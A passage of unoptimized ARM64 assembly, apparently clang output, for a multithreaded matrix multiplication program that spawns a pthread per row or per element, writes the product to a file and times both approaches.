ldr w8, [sp, #16]
add w8, w8, #1
str w8, [sp, #16]
b LBB3_3
LBB3_10: ; in Loop: Header=BB3_1 Depth=1
b LBB3_11
LBB3_11: ; in Loop: Header=BB3_1 Depth=1
ldr w8, [sp, #20]
add w8, w8, #1
str w8, [sp, #20]
b LBB3_1
LBB3_12:
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _compute_for_row ; -- Begin function compute_for_row
.p2align 2
_compute_for_row: ; @compute_for_row
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
ldur x8, [x29, #-8]
stur x8, [x29, #-16]
ldur x8, [x29, #-16]
ldr w8, [x8, #24]
stur w8, [x29, #-20]
ldur x8, [x29, #-16]
ldr x8, [x8]
str x8, [sp, #32]
ldur x8, [x29, #-16]
ldr x8, [x8, #8]
str x8, [sp, #24]
ldur x8, [x29, #-16]
ldr x8, [x8, #16]
str x8, [sp, #16]
b LBB4_1
LBB4_1: ; =>This Loop Header: Depth=1
; Child Loop BB4_3 Depth 2
; Child Loop BB4_5 Depth 3
ldur w8, [x29, #-20]
adrp x9, _a_row@GOTPAGE
ldr x9, [x9, _a_row@GOTPAGEOFF]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB4_12
b LBB4_2
LBB4_2: ; in Loop: Header=BB4_1 Depth=1
str wzr, [sp, #12]
b LBB4_3
LBB4_3: ; Parent Loop BB4_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB4_5 Depth 3
ldr w8, [sp, #12]
adrp x9, _b_col@GOTPAGE
ldr x9, [x9, _b_col@GOTPAGEOFF]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB4_10
b LBB4_4
LBB4_4: ; in Loop: Header=BB4_3 Depth=2
ldr x8, [sp, #16]
ldursw x9, [x29, #-20]
ldr x9, [x8, x9, lsl #3]
ldrsw x10, [sp, #12]
mov w8, #0
str w8, [x9, x10, lsl #2]
str wzr, [sp, #8]
b LBB4_5
LBB4_5: ; Parent Loop BB4_1 Depth=1
; Parent Loop BB4_3 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #8]
adrp x9, _a_col@GOTPAGE
ldr x9, [x9, _a_col@GOTPAGEOFF]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB4_8
b LBB4_6
LBB4_6: ; in Loop: Header=BB4_5 Depth=3
ldr x8, [sp, #32]
ldursw x9, [x29, #-20]
ldr x8, [x8, x9, lsl #3]
ldrsw x9, [sp, #8]
ldr w0, [x8, x9, lsl #2]
ldr x8, [sp, #24]
ldrsw x9, [sp, #8]
ldr x8, [x8, x9, lsl #3]
ldrsw x9, [sp, #12]
ldr w1, [x8, x9, lsl #2]
ldur w2, [x29, #-20]
ldr w3, [sp, #12]
bl _mult_overflow
str w0, [sp, #4]
ldr x8, [sp, #16]
ldursw x9, [x29, #-20]
ldr x8, [x8, x9, lsl #3]
ldrsw x9, [sp, #12]
ldr w0, [x8, x9, lsl #2]
ldr w1, [sp, #4]
ldur w2, [x29, #-20]
ldr w3, [sp, #12]
bl _add_overflow
ldr x8, [sp, #16]
ldursw x9, [x29, #-20]
ldr x8, [x8, x9, lsl #3]
ldrsw x9, [sp, #12]
str w0, [x8, x9, lsl #2]
b LBB4_7
LBB4_7: ; in Loop: Header=BB4_5 Depth=3
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB4_5
LBB4_8: ; in Loop: Header=BB4_3 Depth=2
b LBB4_9
LBB4_9: ; in Loop: Header=BB4_3 Depth=2
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB4_3
LBB4_10: ; in Loop: Header=BB4_1 Depth=1
b LBB4_11
LBB4_11: ; in Loop: Header=BB4_1 Depth=1
ldur w8, [x29, #-20]
add w8, w8, #1
stur w8, [x29, #-20]
b LBB4_1
LBB4_12:
mov x0, #0
bl _pthread_exit
.cfi_endproc
; -- End function
.globl _compute_for_element ; -- Begin function compute_for_element
.p2align 2
_compute_for_element: ; @compute_for_element
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
ldur x8, [x29, #-8]
stur x8, [x29, #-16]
ldur x8, [x29, #-16]
ldr w8, [x8, #24]
stur w8, [x29, #-20]
ldur x8, [x29, #-16]
ldr w8, [x8, #28]
stur w8, [x29, #-24]
ldur x8, [x29, #-16]
ldr x8, [x8]
str x8, [sp, #32]
ldur x8, [x29, #-16]
ldr x8, [x8, #8]
str x8, [sp, #24]
ldur x8, [x29, #-16]
ldr x8, [x8, #16]
str x8, [sp, #16]
ldr x8, [sp, #16]
ldursw x9, [x29, #-20]
ldr x9, [x8, x9, lsl #3]
ldursw x10, [x29, #-24]
mov w8, #0
str w8, [x9, x10, lsl #2]
str wzr, [sp, #12]
b LBB5_1
LBB5_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
adrp x9, _a_col@GOTPAGE
ldr x9, [x9, _a_col@GOTPAGEOFF]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB5_4
b LBB5_2
LBB5_2: ; in Loop: Header=BB5_1 Depth=1
ldr x8, [sp, #32]
ldursw x9, [x29, #-20]
ldr x8, [x8, x9, lsl #3]
ldrsw x9, [sp, #12]
ldr w0, [x8, x9, lsl #2]
ldr x8, [sp, #24]
ldrsw x9, [sp, #12]
ldr x8, [x8, x9, lsl #3]
ldursw x9, [x29, #-24]
ldr w1, [x8, x9, lsl #2]
ldur w2, [x29, #-20]
ldur w3, [x29, #-24]
bl _mult_overflow
str w0, [sp, #8]
ldr x8, [sp, #16]
ldursw x9, [x29, #-20]
ldr x8, [x8, x9, lsl #3]
ldursw x9, [x29, #-24]
ldr w0, [x8, x9, lsl #2]
ldr w1, [sp, #8]
ldur w2, [x29, #-20]
ldur w3, [x29, #-24]
bl _add_overflow
ldr x8, [sp, #16]
ldursw x9, [x29, #-20]
ldr x8, [x8, x9, lsl #3]
ldursw x9, [x29, #-24]
str w0, [x8, x9, lsl #2]
b LBB5_3
LBB5_3: ; in Loop: Header=BB5_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB5_1
LBB5_4:
mov x0, #0
bl _pthread_exit
.cfi_endproc
; -- End function
.globl _thread_for_row ; -- Begin function thread_for_row
.p2align 2
_thread_for_row: ; @thread_for_row
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
sub sp, sp, #112
adrp x8, _a_row@GOTPAGE
ldr x8, [x8, _a_row@GOTPAGEOFF]
stur x8, [x29, #-96] ; 8-byte Folded Spill
adrp x9, ___stack_chk_guard@GOTPAGE
ldr x9, [x9, ___stack_chk_guard@GOTPAGEOFF]
ldr x9, [x9]
stur x9, [x29, #-8]
stur x0, [x29, #-16]
stur x1, [x29, #-24]
stur x2, [x29, #-32]
ldr w8, [x8]
; kill: def $x8 killed $w8
mov x9, sp
stur x9, [x29, #-40]
lsl x9, x8, #3
add x9, x9, #15
and x9, x9, #0xfffffffffffffff0
stur x9, [x29, #-88] ; 8-byte Folded Spill
adrp x16, ___chkstk_darwin@GOTPAGE
ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF]
blr x16
ldur x10, [x29, #-88] ; 8-byte Folded Reload
mov x9, sp
subs x9, x9, x10
mov sp, x9
stur x9, [x29, #-80] ; 8-byte Folded Spill
stur x8, [x29, #-48]
stur wzr, [x29, #-56]
b LBB6_1
LBB6_1: ; =>This Inner Loop Header: Depth=1
ldur x9, [x29, #-96] ; 8-byte Folded Reload
ldur w8, [x29, #-56]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB6_6
b LBB6_2
LBB6_2: ; in Loop: Header=BB6_1 Depth=1
mov x0, #32
bl _malloc
ldur x8, [x29, #-80] ; 8-byte Folded Reload
stur x0, [x29, #-64]
ldur x9, [x29, #-16]
ldur x10, [x29, #-64]
str x9, [x10]
ldur x9, [x29, #-24]
ldur x10, [x29, #-64]
str x9, [x10, #8]
ldur x9, [x29, #-32]
ldur x10, [x29, #-64]
str x9, [x10, #16]
ldur w9, [x29, #-56]
ldur x10, [x29, #-64]
str w9, [x10, #24]
ldursw x9, [x29, #-56]
add x0, x8, x9, lsl #3
ldur x3, [x29, #-64]
mov x1, #0
adrp x2, _compute_for_row@PAGE
add x2, x2, _compute_for_row@PAGEOFF
bl _pthread_create
stur w0, [x29, #-52]
ldur w8, [x29, #-52]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB6_4
b LBB6_3
LBB6_3:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
ldur w9, [x29, #-52]
; implicit-def: $x8
mov x8, x9
sub sp, sp, #16
mov x9, sp
str x8, [x9]
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _fprintf
add sp, sp, #16
mov w0, #-1
bl _exit
LBB6_4: ; in Loop: Header=BB6_1 Depth=1
b LBB6_5
LBB6_5: ; in Loop: Header=BB6_1 Depth=1
ldur w8, [x29, #-56]
add w8, w8, #1
stur w8, [x29, #-56]
b LBB6_1
LBB6_6:
stur wzr, [x29, #-68]
b LBB6_7
LBB6_7: ; =>This Inner Loop Header: Depth=1
ldur x9, [x29, #-96] ; 8-byte Folded Reload
ldur w8, [x29, #-68]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB6_12
b LBB6_8
LBB6_8: ; in Loop: Header=BB6_7 Depth=1
ldur x8, [x29, #-80] ; 8-byte Folded Reload
ldursw x9, [x29, #-68]
ldr x0, [x8, x9, lsl #3]
mov x1, #0
bl _pthread_join
ldur w8, [x29, #-52]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB6_10
b LBB6_9
LBB6_9:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
ldur w9, [x29, #-52]
; implicit-def: $x8
mov x8, x9
sub sp, sp, #16
mov x9, sp
str x8, [x9]
adrp x1, l_.str.12@PAGE
add x1, x1, l_.str.12@PAGEOFF
bl _fprintf
add sp, sp, #16
mov w0, #-1
bl _exit
LBB6_10: ; in Loop: Header=BB6_7 Depth=1
b LBB6_11
LBB6_11: ; in Loop: Header=BB6_7 Depth=1
ldur w8, [x29, #-68]
add w8, w8, #1
stur w8, [x29, #-68]
b LBB6_7
LBB6_12:
ldur x8, [x29, #-96] ; 8-byte Folded Reload
ldr w9, [x8]
; implicit-def: $x8
mov x8, x9
sub sp, sp, #16
mov x9, sp
str x8, [x9]
adrp x0, l_.str.13@PAGE
add x0, x0, l_.str.13@PAGEOFF
bl _printf
add sp, sp, #16
ldur x8, [x29, #-40]
stur x8, [x29, #-104] ; 8-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB6_14
b LBB6_13
LBB6_13:
bl ___stack_chk_fail
LBB6_14:
ldur x8, [x29, #-104] ; 8-byte Folded Reload
mov sp, x8
mov sp, x29
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.globl _thread_for_element ; -- Begin function thread_for_element
.p2align 2
_thread_for_element: ; @thread_for_element
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
sub sp, sp, #128
adrp x8, _a_row@GOTPAGE
ldr x8, [x8, _a_row@GOTPAGEOFF]
stur x8, [x29, #-112] ; 8-byte Folded Spill
adrp x9, _b_col@GOTPAGE
ldr x9, [x9, _b_col@GOTPAGEOFF]
stur x9, [x29, #-104] ; 8-byte Folded Spill
adrp x10, ___stack_chk_guard@GOTPAGE
ldr x10, [x10, ___stack_chk_guard@GOTPAGEOFF]
ldr x10, [x10]
stur x10, [x29, #-8]
stur x0, [x29, #-16]
stur x1, [x29, #-24]
stur x2, [x29, #-32]
ldr w8, [x8]
ldr w9, [x9]
mul w8, w8, w9
; kill: def $x8 killed $w8
mov x9, sp
stur x9, [x29, #-40]
lsl x9, x8, #3
add x9, x9, #15
and x9, x9, #0xfffffffffffffff0
stur x9, [x29, #-96] ; 8-byte Folded Spill
adrp x16, ___chkstk_darwin@GOTPAGE
ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF]
blr x16
ldur x10, [x29, #-96] ; 8-byte Folded Reload
mov x9, sp
subs x9, x9, x10
mov sp, x9
stur x9, [x29, #-88] ; 8-byte Folded Spill
stur x8, [x29, #-48]
stur wzr, [x29, #-56]
b LBB7_1
LBB7_1: ; =>This Loop Header: Depth=1
; Child Loop BB7_3 Depth 2
ldur x9, [x29, #-112] ; 8-byte Folded Reload
ldur w8, [x29, #-56]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_10
b LBB7_2
LBB7_2: ; in Loop: Header=BB7_1 Depth=1
stur wzr, [x29, #-60]
b LBB7_3
LBB7_3: ; Parent Loop BB7_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur x9, [x29, #-104] ; 8-byte Folded Reload
ldur w8, [x29, #-60]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_8
b LBB7_4
LBB7_4: ; in Loop: Header=BB7_3 Depth=2
mov x0, #32
bl _malloc
ldur x10, [x29, #-104] ; 8-byte Folded Reload
ldur x8, [x29, #-88] ; 8-byte Folded Reload
stur x0, [x29, #-72]
ldur x9, [x29, #-16]
ldur x11, [x29, #-72]
str x9, [x11]
ldur x9, [x29, #-24]
ldur x11, [x29, #-72]
str x9, [x11, #8]
ldur x9, [x29, #-32]
ldur x11, [x29, #-72]
str x9, [x11, #16]
ldur w9, [x29, #-56]
ldur x11, [x29, #-72]
str w9, [x11, #24]
ldur w9, [x29, #-60]
ldur x11, [x29, #-72]
str w9, [x11, #28]
ldur w9, [x29, #-56]
ldr w10, [x10]
mul w9, w9, w10
ldur w10, [x29, #-60]
add w9, w9, w10
add x0, x8, w9, sxtw #3
ldur x3, [x29, #-72]
mov x1, #0
adrp x2, _compute_for_element@PAGE
add x2, x2, _compute_for_element@PAGEOFF
bl _pthread_create
stur w0, [x29, #-52]
ldur w8, [x29, #-52]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_6
b LBB7_5
LBB7_5:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
ldur w9, [x29, #-52]
; implicit-def: $x8
mov x8, x9
sub sp, sp, #16
mov x9, sp
str x8, [x9]
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _fprintf
add sp, sp, #16
mov w0, #-1
bl _exit
LBB7_6: ; in Loop: Header=BB7_3 Depth=2
b LBB7_7
LBB7_7: ; in Loop: Header=BB7_3 Depth=2
ldur w8, [x29, #-60]
add w8, w8, #1
stur w8, [x29, #-60]
b LBB7_3
LBB7_8: ; in Loop: Header=BB7_1 Depth=1
b LBB7_9
LBB7_9: ; in Loop: Header=BB7_1 Depth=1
ldur w8, [x29, #-56]
add w8, w8, #1
stur w8, [x29, #-56]
b LBB7_1
LBB7_10:
stur wzr, [x29, #-76]
b LBB7_11
LBB7_11: ; =>This Loop Header: Depth=1
; Child Loop BB7_13 Depth 2
ldur x9, [x29, #-112] ; 8-byte Folded Reload
ldur w8, [x29, #-76]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_20
b LBB7_12
LBB7_12: ; in Loop: Header=BB7_11 Depth=1
stur wzr, [x29, #-80]
b LBB7_13
LBB7_13: ; Parent Loop BB7_11 Depth=1
; => This Inner Loop Header: Depth=2
ldur x9, [x29, #-104] ; 8-byte Folded Reload
ldur w8, [x29, #-80]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_18
b LBB7_14
LBB7_14: ; in Loop: Header=BB7_13 Depth=2
ldur x8, [x29, #-88] ; 8-byte Folded Reload
ldur x10, [x29, #-104] ; 8-byte Folded Reload
ldur w9, [x29, #-76]
ldr w10, [x10]
mul w9, w9, w10
ldur w10, [x29, #-80]
add w9, w9, w10
ldr x0, [x8, w9, sxtw #3]
mov x1, #0
bl _pthread_join
ldur w8, [x29, #-52]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_16
b LBB7_15
LBB7_15:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
ldur w9, [x29, #-52]
; implicit-def: $x8
mov x8, x9
sub sp, sp, #16
mov x9, sp
str x8, [x9]
adrp x1, l_.str.12@PAGE
add x1, x1, l_.str.12@PAGEOFF
bl _fprintf
add sp, sp, #16
mov w0, #-1
bl _exit
LBB7_16: ; in Loop: Header=BB7_13 Depth=2
b LBB7_17
LBB7_17: ; in Loop: Header=BB7_13 Depth=2
ldur w8, [x29, #-80]
add w8, w8, #1
stur w8, [x29, #-80]
b LBB7_13
LBB7_18: ; in Loop: Header=BB7_11 Depth=1
b LBB7_19
LBB7_19: ; in Loop: Header=BB7_11 Depth=1
ldur w8, [x29, #-76]
add w8, w8, #1
stur w8, [x29, #-76]
b LBB7_11
LBB7_20:
ldur x9, [x29, #-104] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
mul w10, w8, w9
sub sp, sp, #16
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.14@PAGE
add x0, x0, l_.str.14@PAGEOFF
bl _printf
add sp, sp, #16
ldur x8, [x29, #-40]
stur x8, [x29, #-120] ; 8-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB7_22
b LBB7_21
LBB7_21:
bl ___stack_chk_fail
LBB7_22:
ldur x8, [x29, #-120] ; 8-byte Folded Reload
mov sp, x8
mov sp, x29
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.globl _write_output ; -- Begin function write_output
.p2align 2
_write_output: ; @write_output
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _b_col@GOTPAGE
ldr x8, [x8, _b_col@GOTPAGEOFF]
str x8, [sp, #24] ; 8-byte Folded Spill
stur x0, [x29, #-8]
stur x1, [x29, #-16]
ldur x0, [x29, #-16]
adrp x1, l_.str.15@PAGE
add x1, x1, l_.str.15@PAGEOFF
bl _fopen
ldr x8, [sp, #24] ; 8-byte Folded Reload
stur x0, [x29, #-24]
ldur x0, [x29, #-24]
adrp x9, _a_row@GOTPAGE
ldr x9, [x9, _a_row@GOTPAGEOFF]
ldr w9, [x9]
; implicit-def: $x10
mov x10, x9
ldr w9, [x8]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
bl _fprintf
stur wzr, [x29, #-28]
b LBB8_1
LBB8_1: ; =>This Loop Header: Depth=1
; Child Loop BB8_3 Depth 2
ldur w8, [x29, #-28]
adrp x9, _a_row@GOTPAGE
ldr x9, [x9, _a_row@GOTPAGEOFF]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB8_11
b LBB8_2
LBB8_2: ; in Loop: Header=BB8_1 Depth=1
str wzr, [sp, #32]
b LBB8_3
LBB8_3: ; Parent Loop BB8_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldr w8, [sp, #32]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB8_9
b LBB8_4
LBB8_4: ; in Loop: Header=BB8_3 Depth=2
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldr w8, [sp, #32]
ldr w9, [x9]
subs w9, w9, #1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB8_6
b LBB8_5
LBB8_5: ; in Loop: Header=BB8_3 Depth=2
ldur x0, [x29, #-24]
ldur x8, [x29, #-8]
ldursw x9, [x29, #-28]
ldr x8, [x8, x9, lsl #3]
ldrsw x9, [sp, #32]
ldr w9, [x8, x9, lsl #2]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x1, l_.str.16@PAGE
add x1, x1, l_.str.16@PAGEOFF
bl _fprintf
b LBB8_7
LBB8_6: ; in Loop: Header=BB8_3 Depth=2
ldur x0, [x29, #-24]
ldur x8, [x29, #-8]
ldursw x9, [x29, #-28]
ldr x8, [x8, x9, lsl #3]
ldrsw x9, [sp, #32]
ldr w9, [x8, x9, lsl #2]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x1, l_.str.17@PAGE
add x1, x1, l_.str.17@PAGEOFF
bl _fprintf
b LBB8_7
LBB8_7: ; in Loop: Header=BB8_3 Depth=2
b LBB8_8
LBB8_8: ; in Loop: Header=BB8_3 Depth=2
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB8_3
LBB8_9: ; in Loop: Header=BB8_1 Depth=1
b LBB8_10
LBB8_10: ; in Loop: Header=BB8_1 Depth=1
ldur w8, [x29, #-28]
add w8, w8, #1
stur w8, [x29, #-28]
b LBB8_1
LBB8_11:
ldur x0, [x29, #-24]
bl _fclose
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _show ; -- Begin function show
.p2align 2
_show: ; @show
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur wzr, [x29, #-12]
b LBB9_1
LBB9_1: ; =>This Loop Header: Depth=1
; Child Loop BB9_3 Depth 2
ldur w8, [x29, #-12]
adrp x9, _a_row@GOTPAGE
ldr x9, [x9, _a_row@GOTPAGEOFF]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB9_8
b LBB9_2
LBB9_2: ; in Loop: Header=BB9_1 Depth=1
str wzr, [sp, #16]
b LBB9_3
LBB9_3: ; Parent Loop BB9_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #16]
adrp x9, _b_col@GOTPAGE
ldr x9, [x9, _b_col@GOTPAGEOFF]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB9_6
b LBB9_4
LBB9_4: ; in Loop: Header=BB9_3 Depth=2
ldur x8, [x29, #-8]
ldursw x9, [x29, #-12]
ldr x8, [x8, x9, lsl #3]
ldrsw x9, [sp, #16]
ldr w9, [x8, x9, lsl #2]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.18@PAGE
add x0, x0, l_.str.18@PAGEOFF
bl _printf
b LBB9_5
LBB9_5: ; in Loop: Header=BB9_3 Depth=2
ldr w8, [sp, #16]
add w8, w8, #1
str w8, [sp, #16]
b LBB9_3
LBB9_6: ; in Loop: Header=BB9_1 Depth=1
adrp x0, l_.str.19@PAGE
add x0, x0, l_.str.19@PAGEOFF
bl _printf
b LBB9_7
LBB9_7: ; in Loop: Header=BB9_1 Depth=1
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB9_1
LBB9_8:
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #176
.cfi_def_cfa_offset 176
stp x29, x30, [sp, #160] ; 16-byte Folded Spill
add x29, sp, #160
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
stur w0, [x29, #-8]
stur x1, [x29, #-16]
adrp x8, l_.str.20@PAGE
add x8, x8, l_.str.20@PAGEOFF
stur x8, [x29, #-24]
adrp x8, l_.str.21@PAGE
add x8, x8, l_.str.21@PAGEOFF
stur x8, [x29, #-32]
adrp x8, l_.str.22@PAGE
add x8, x8, l_.str.22@PAGEOFF
stur x8, [x29, #-40]
ldur w8, [x29, #-8]
subs w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB10_2
b LBB10_1
LBB10_1:
ldur x8, [x29, #-16]
ldr x8, [x8, #8]
stur x8, [x29, #-24]
b LBB10_11
LBB10_2:
ldur w8, [x29, #-8]
subs w8, w8, #3
cset w8, ne
tbnz w8, #0, LBB10_4
b LBB10_3
LBB10_3:
ldur x8, [x29, #-16]
ldr x8, [x8, #8]
stur x8, [x29, #-24]
ldur x8, [x29, #-16]
ldr x8, [x8, #16]
stur x8, [x29, #-32]
b LBB10_10
LBB10_4:
ldur w8, [x29, #-8]
subs w8, w8, #4
cset w8, ne
tbnz w8, #0, LBB10_6
b LBB10_5
LBB10_5:
ldur x8, [x29, #-16]
ldr x8, [x8, #8]
stur x8, [x29, #-24]
ldur x8, [x29, #-16]
ldr x8, [x8, #16]
stur x8, [x29, #-32]
ldur x8, [x29, #-16]
ldr x8, [x8, #24]
stur x8, [x29, #-40]
b LBB10_9
LBB10_6:
ldur w8, [x29, #-8]
subs w8, w8, #4
cset w8, le
tbnz w8, #0, LBB10_8
b LBB10_7
LBB10_7:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.23@PAGE
add x1, x1, l_.str.23@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
LBB10_8:
b LBB10_9
LBB10_9:
b LBB10_10
LBB10_10:
b LBB10_11
LBB10_11:
ldur x0, [x29, #-24]
mov w8, #1
str w8, [sp, #52] ; 4-byte Folded Spill
mov w8, #0
and w1, w8, #0x1
bl _read_file
ldr w8, [sp, #52] ; 4-byte Folded Reload
stur x0, [x29, #-48]
ldur x0, [x29, #-32]
and w1, w8, #0x1
bl _read_file
stur x0, [x29, #-56]
adrp x8, _a_row@GOTPAGE
ldr x8, [x8, _a_row@GOTPAGEOFF]
ldrsw x8, [x8]
lsl x0, x8, #3
bl _malloc
stur x0, [x29, #-64]
stur wzr, [x29, #-68]
b LBB10_12
LBB10_12: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-68]
adrp x9, _a_row@GOTPAGE
ldr x9, [x9, _a_row@GOTPAGEOFF]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB10_15
b LBB10_13
LBB10_13: ; in Loop: Header=BB10_12 Depth=1
adrp x8, _b_col@GOTPAGE
ldr x8, [x8, _b_col@GOTPAGEOFF]
ldrsw x8, [x8]
lsl x0, x8, #2
bl _malloc
ldur x8, [x29, #-64]
ldursw x9, [x29, #-68]
str x0, [x8, x9, lsl #3]
b LBB10_14
LBB10_14: ; in Loop: Header=BB10_12 Depth=1
ldur w8, [x29, #-68]
add w8, w8, #1
stur w8, [x29, #-68]
b LBB10_12
LBB10_15:
add x0, sp, #72
str x0, [sp, #8] ; 8-byte Folded Spill
mov x1, #0
str x1, [sp, #24] ; 8-byte Folded Spill
bl _gettimeofday
ldur x0, [x29, #-48]
ldur x1, [x29, #-56]
ldur x2, [x29, #-64]
bl _thread_for_row
ldr x1, [sp, #24] ; 8-byte Folded Reload
add x0, sp, #56
str x0, [sp, #16] ; 8-byte Folded Spill
bl _gettimeofday
ldr x8, [sp, #56]
ldr x9, [sp, #72]
subs x8, x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.24@PAGE
add x0, x0, l_.str.24@PAGEOFF
str x0, [sp, #32] ; 8-byte Folded Spill
bl _printf
ldr w8, [sp, #64]
ldr w9, [sp, #80]
subs w10, w8, w9
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.25@PAGE
add x0, x0, l_.str.25@PAGEOFF
str x0, [sp, #40] ; 8-byte Folded Spill
bl _printf
ldr x1, [sp, #24] ; 8-byte Folded Reload
ldr x0, [sp, #8] ; 8-byte Folded Reload
bl _gettimeofday
ldur x0, [x29, #-48]
ldur x1, [x29, #-56]
ldur x2, [x29, #-64]
bl _thread_for_element
ldr x0, [sp, #16] ; 8-byte Folded Reload
ldr x1, [sp, #24] ; 8-byte Folded Reload
bl _gettimeofday
ldr x0, [sp, #32] ; 8-byte Folded Reload
